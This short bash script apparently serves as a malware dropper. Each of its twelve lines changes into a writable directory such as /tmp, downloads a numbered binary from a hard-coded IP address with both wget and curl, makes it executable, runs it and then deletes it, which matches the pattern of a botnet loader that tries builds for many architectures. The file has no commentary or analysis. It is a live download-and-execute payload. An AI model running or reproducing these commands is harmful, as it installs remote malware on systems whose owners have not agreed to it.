#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis0; curl -O http://89.34.26.34/ilovepenis0; chmod +x ilovepenis0; ./ilovepenis0; rm -rf ilovepenis0
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis1; curl -O http://89.34.26.34/ilovepenis1; chmod +x ilovepenis1; ./ilovepenis1; rm -rf ilovepenis1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis2; curl -O http://89.34.26.34/ilovepenis2; chmod +x ilovepenis2; ./ilovepenis2; rm -rf ilovepenis2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis3; curl -O http://89.34.26.34/ilovepenis3; chmod +x ilovepenis3; ./ilovepenis3; rm -rf ilovepenis3
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis4; curl -O http://89.34.26.34/ilovepenis4; chmod +x ilovepenis4; ./ilovepenis4; rm -rf ilovepenis4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis5; curl -O http://89.34.26.34/ilovepenis5; chmod +x ilovepenis5; ./ilovepenis5; rm -rf ilovepenis5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis6; curl -O http://89.34.26.34/ilovepenis6; chmod +x ilovepenis6; ./ilovepenis6; rm -rf ilovepenis6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis7; curl -O http://89.34.26.34/ilovepenis7; chmod +x ilovepenis7; ./ilovepenis7; rm -rf ilovepenis7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis8; curl -O http://89.34.26.34/ilovepenis8; chmod +x ilovepenis8; ./ilovepenis8; rm -rf ilovepenis8
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis9; curl -O http://89.34.26.34/ilovepenis9; chmod +x ilovepenis9; ./ilovepenis9; rm -rf ilovepenis9
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis10; curl -O http://89.34.26.34/ilovepenis10; chmod +x ilovepenis10; ./ilovepenis10; rm -rf ilovepenis10
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.26.34/ilovepenis11; curl -O http://89.34.26.34/ilovepenis11; chmod +x ilovepenis11; ./ilovepenis11; rm -rf ilovepenis11
